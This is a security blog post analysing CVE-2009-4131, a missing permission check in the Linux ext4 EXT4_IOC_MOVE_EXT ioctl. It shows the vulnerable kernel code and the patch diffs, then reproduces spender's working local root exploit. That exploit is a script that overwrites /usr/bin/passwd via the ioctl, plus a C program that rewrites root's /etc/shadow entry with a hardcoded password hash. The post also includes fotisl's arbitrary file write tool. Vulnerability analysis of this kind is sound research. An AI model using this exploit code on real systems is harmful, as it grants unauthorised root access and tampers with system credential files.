xorl %eax, %eax

CVE-2009-4131: Linux kernel EXT4 IOCTL Insufficient Checks

with one comment

A couple of weeks ago, this bug was being discussed everywhere. Unfortunately, I didn’t have time to blog about it before. Anyway, here is my delayed post…
The vulnerability was discovered by Akira Fujita of NEC on 7 December 2009 and it affects Linux kernel prior to 2.6.32-git6 release. Here is the buggy code as seen in fs/ext4/ioctl.c of 2.6.31 release of the Linux kernel.

long ext4_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
        struct inode *inode = filp->f_dentry->d_inode;
        struct ext4_inode_info *ei = EXT4_I(inode);
        unsigned int flags;

        ext4_debug("cmd = %u, arg = %lu\n", cmd, arg);

        switch (cmd) {

So, this is the main IOCTL handler routine for the EXT4 filesystem, if we move to the ‘EXT4_IOC_MOVE_EXT’ (which is used to exchange the specified range of a file) command we’ll see this:

        case EXT4_IOC_MOVE_EXT: {
                struct move_extent me;
                struct file *donor_filp;
                int err;

                if (copy_from_user(&me,
                        (struct move_extent __user *)arg, sizeof(me)))
                        return -EFAULT;

This is a simple code that copies the user controlled argument to a ‘move_extent’ structure which is in turn defined at fs/ext4/ext4.h like that:

struct move_extent {
        __u32 reserved;         /* should be zero */
        __u32 donor_fd;         /* donor file descriptor */
        __u64 orig_start;       /* logical start offset in block for orig */
        __u64 donor_start;      /* logical start offset in block for donor */
        __u64 len;              /* block length to be moved */
        __u64 moved_len;        /* moved block length */

If we move back to our IOCTL command, the code will continue like this:

                donor_filp = fget(me.donor_fd);
                if (!donor_filp)
                        return -EBADF;

                if (!capable(CAP_DAC_OVERRIDE)) {
                        if ((current->real_cred->fsuid != inode->i_uid) ||
                                !(inode->i_mode & S_IRUSR) ||
                                !(donor_filp->f_dentry->d_inode->i_mode &
                                S_IRUSR)) {
                                return -EACCES;

It’ll initialize ‘donor_filp’ with the file descriptor of donor from the user controlled argument using fget() and check the ‘CAP_DAC_OVERRIDE’ (override all DAC access) capability. The next code to be executed is:

                err = ext4_move_extents(filp, donor_filp, me.orig_start,
                                        me.donor_start, me.len, &me.moved_len);

                if (!err)
                        if (copy_to_user((struct move_extent *)arg,
                                &me, sizeof(me)))
                                return -EFAULT;
                return err;

If it had reached this, it will immediately invoke ext4_move_extents() and just release the donor file descriptor. At last, if there was no error code returned, the updated ‘me’ structure will be copied back to the user space one.
Now here are the three fixes that Akira Fujita made on this IOCTL command…

1. In current EXT4_IOC_MOVE_EXT, there are read access mode checks for
original and donor files, but they allow the illegal write access to
donor file, since donor file is overwritten by original file data.  To
fix this problem, change access mode checks of original (r->r/w) and
donor (r->w) files.

Well, this is probably the most important one from a security point of view. To remove this functionality of arbitrary write access the following code was added for the original file:

                int err;
+               if (!(filp->f_mode & FMODE_READ) ||
+                   !(filp->f_mode & FMODE_WRITE))
+                       return -EBADF;
                if (copy_from_user(&me,
                        (struct move_extent __user *)arg, sizeof(me)))
                        return -EFAULT;

That will return with “Bad File Descriptor” in case of a file mode non-readable or non-writable and for the original file:

                donor_filp = fget(me.donor_fd);
                if (!donor_filp)
                        return -EBADF;
-               if (!capable(CAP_DAC_OVERRIDE)) {
-                       if ((current->real_cred->fsuid != inode->i_uid) ||
-                               !(inode->i_mode & S_IRUSR) ||
-                               !(donor_filp->f_dentry->d_inode->i_mode &
-                               S_IRUSR)) {
-                               fput(donor_filp);
-                               return -EACCES;
-                       }
+               if (!(donor_filp->f_mode & FMODE_WRITE)) {
+                       err = -EBADF;
+                       goto mext_out;

The capability check was removed and new code was added to check for write access before attempting to write to it. Because of this missing checks, a user could write to files even if he hadn’t write access on them since there was no check for that!

2.  Disallow the use of donor files that have a setuid or setgid bits.

Another important fix. You could write to any file of the system, even on SETUID/SETGID files regardless of your actual file access modes, to fix this one mext_check_arguments() (from fs/ext4/move_extent.c) was updated to include this code:

+       if (donor_inode->i_mode & (S_ISUID|S_ISGID)) {
+               ext4_debug("ext4 move extent: suid or sgid is set"
+                          " to donor file [ino:orig %lu, donor %lu]\n",
+                          orig_inode->i_ino, donor_inode->i_ino);
+               return -EINVAL;
+       }
        /* Ext4 move extent does not support swapfile */

Which is a common inode mode check against SUID/SGID flags. The final bugfix in this EXT4 IOCTL command was…

3.  Call mnt_want_write() and mnt_drop_write() before and after
ext4_move_extents() calling to get write access to a mount.

That translates to:

-               me.moved_len = 0;
+               err = mnt_want_write(filp->f_path.mnt);
+               if (err)
+                       goto mext_out;
                err = ext4_move_extents(filp, donor_filp, me.orig_start,
                                        me.donor_start, me.len, &me.moved_len);
-               fput(donor_filp);
+               mnt_drop_write(filp->f_path.mnt);
+               if (me.moved_len > 0)
+                       file_remove_suid(donor_filp);

As you probably have imagined and it isn’t that important from a security perspective in comparison to the other two.
This trivial vulnerability was exploited by countless people but spender published his exploit which you can download here.
The exploit is executed using a BASH shell script (ext4_own.sh) which is this:

if [ ! -f ./passwd.bak ]; then
  cp /usr/bin/passwd ./passwd.bak
cc -o ext4 ext4.c
cc -o modify_shadow modify_shadow.c
strip ./modify_shadow
echo "replacing /etc/shadow..."
echo "flushing cache..."
grep blah -r -l /usr/share 1> /dev/null 2> /dev/null
echo "enjoy your new root account, password is \"password\", old shadow file saved as /etc/shadow-!"
su - root

This script checks if ‘passwd.bak’ file is present and copies ‘/usr/bin/passwd’ to that file if it isn’t. It then compiles ext4.c and modify_shadow.c files which are part of the exploit and executes ext4 executable. Finally, it flushes the cache using sync(1), performs a grep(1) that I don’t know why he’s doing it and then executes ‘/usr/bin/passwd’ to run ‘modify_shadow’ as you’ll see below. It ends by switching to root user using su(1).
The ext4.c file is also quite simple… Apart from these:

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <linux/falloc.h>

struct move_extent {
	unsigned int reserved;
	unsigned int donor_fd;
	unsigned long long orig_start;
	unsigned long long donor_start;
	unsigned long long len;
	unsigned long long moved_len;

#define EXT4_IOC_MOVE_EXT	_IOWR('f', 15, struct move_extent)

You can find this code:

int main(void)
	struct move_extent mvext;
	struct stat st;
	int fd1, fd2;
	int len;
	char *buf;
	char *mem;

	fd1 = open("/usr/bin/passwd", O_RDONLY);
	fd2 = open("./modify_shadow", O_RDONLY);

	stat("./modify_shadow", &st);

	mvext.reserved = 0;
	mvext.donor_fd = fd1;
	mvext.orig_start = 0;
	mvext.donor_start = 0;
	mvext.len = st.st_blocks;
	mvext.moved_len = 0;

	ioctl(fd2, EXT4_IOC_MOVE_EXT, &mvext);

	return 0;	

In a few words, he sets the donor file descriptor to ‘/usr/bin/passwd’ and the original file to ‘./modify_shadow’. Because of the previously discussed bug and since the starting offsets are 0, it will copy ‘./modify_shadow’ to ‘/usr/bin/passwd’. Let’s have a look at the other source code file now…

#include <stdio.h>

int main(void)
	FILE *f, *f2;
	char buf[1024];

	f = fopen("/etc/shadow", "r");
	f2 = fopen("/etc/shadow-", "w+");
	while (fgets(buf, sizeof(buf) - 1, f))
		fprintf(f2, "%s", buf);

	f = fopen("/etc/shadow-", "r");
	f2 = fopen("/etc/shadow", "w+");
	while (fgets(buf, sizeof(buf) - 1, f)) {
		if (!strncmp(buf, "root:", 5))
			fprintf(f2, "root:$1$pg5XXts7$EsWE/0AktuZ2K91946enD.:14443::::::\n");
			fprintf(f2, "%s", buf);

	return 0;

This is also straightforward. He first backups ‘/etc/shadow’ to ‘/etc/shadow-‘ and then finds the “root” entry in ‘/etc/shadow’ and replaces it with a hardcoded one that has password of ‘password’ as the “echo” in ext4_own.sh says. That was with spender’s exploit for CVE-2009-4131.
More recently, fotisl blogged about this bug too. He also included a code which you can download here. Once again, apart from the expected…

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#define __USE_GNU
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <linux/fs.h>
#include <linux/fiemap.h>

struct move_extent {
    int orig_fd;
    int donor_fd;
    uint64_t orig_start;
    uint64_t donor_start;
    uint64_t len;
    uint64_t moved_len;

#define EXT4_IOC_MOVE_EXT   _IOWR('f', 15, struct move_extent)

#define EXTENT_MAX_COUNT    512

The code opens up the two files based on arguments passed to the program like this:

int main(int argc, char **argv)
    char *orig, *donor;
    struct move_extent me;
    int donorfd, origfd;
    int off, len;

    if(argc != 5) {
        printf("Usage: %s <orig> <donor> <offset> <len>\n", argv[0]);
    orig = argv[1];
    donor = argv[2];
    off = atoi(argv[3]);
    len = atoi(argv[4]);

    if((donorfd = open(donor, O_RDONLY | O_EXCL)) < 0) {
        perror("open donor");

    if((origfd = open(orig, O_RDONLY | O_EXCL)) < 0) {
        perror("open orig");

The arguments include the offset and the length so I’m assuming that this is more of a simple ‘EXT4_IOC_MOVE_EXT’ user space application but because of the EXT4 implementation it can be easily used to perform arbitrary writes to files. After opening the donor and original files, it continues like this:

    printf("orig extents: %i\n", getextents(origfd));
    printf("donor extents: %i\n", getextents(donorfd));

The getextends() is a function provided in ext4movext.c that will return the number of extents that were mapped like this:

int getextents(int fd)
    struct stat stbuf;
    struct fiemap *fmap;
    int extents;

    if((fmap = malloc(sizeof(*fmap) + EXTENT_MAX_COUNT *
                    sizeof(struct fiemap_extent))) == NULL) {
        return -1;

    fstat(fd, &stbuf);

    fmap->fm_start = 0;
    fmap->fm_length = stbuf.st_size;
    fmap->fm_flags = 0;
    fmap->fm_extent_count = EXTENT_MAX_COUNT;

    if(ioctl(fd, FS_IOC_FIEMAP, fmap) < 0) {
        return -1;

    extents = fmap->fm_mapped_extents;

    return extents;

Finally, the IOCTL call takes place…

    me.orig_fd = origfd;
    me.donor_fd = donorfd;
    me.orig_start = off;
    me.donor_start = off;
    me.len = len;
    me.moved_len = 0;

    if(ioctl(origfd, EXT4_IOC_MOVE_EXT, &me) < 0) {

    printf("moved len = %li\n", me.moved_len);


    return 0;

After a quick conversation with spender on twitter he explained to me the grep(1) use that I did not understand, here is his explanation in his own words (I’m just pasting it since it is more convenenient here because it wasn’t on a single tweet):
spender’s reply:
For the changes you make via the ioctl to be visible immediately, you need to flush various caches in the kernel. On normal distros (ones using ext4) /usr/share will be quite large — 2GB on my machine. The grep is effectively used to read files. This causes the file/page caches to flush, then following that /usr/bin/passwd when executed will finally reflect its new content. Otherwise, as fotisl was having the problem, you would need to remount or reboot the machine to see the reflected changes.
end of spender’s reply.
Even though I disagree with him in numerous subjects, I have to publicly thank him for this response.
Thanks spender.

Written by xorl

January 1, 2010 at 07:59

Posted in linux, vulnerabilities

One Response

Subscribe to comments with RSS.

  1. Thanks this helped me in Offsec ;)


    October 24, 2014 at 03:55

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s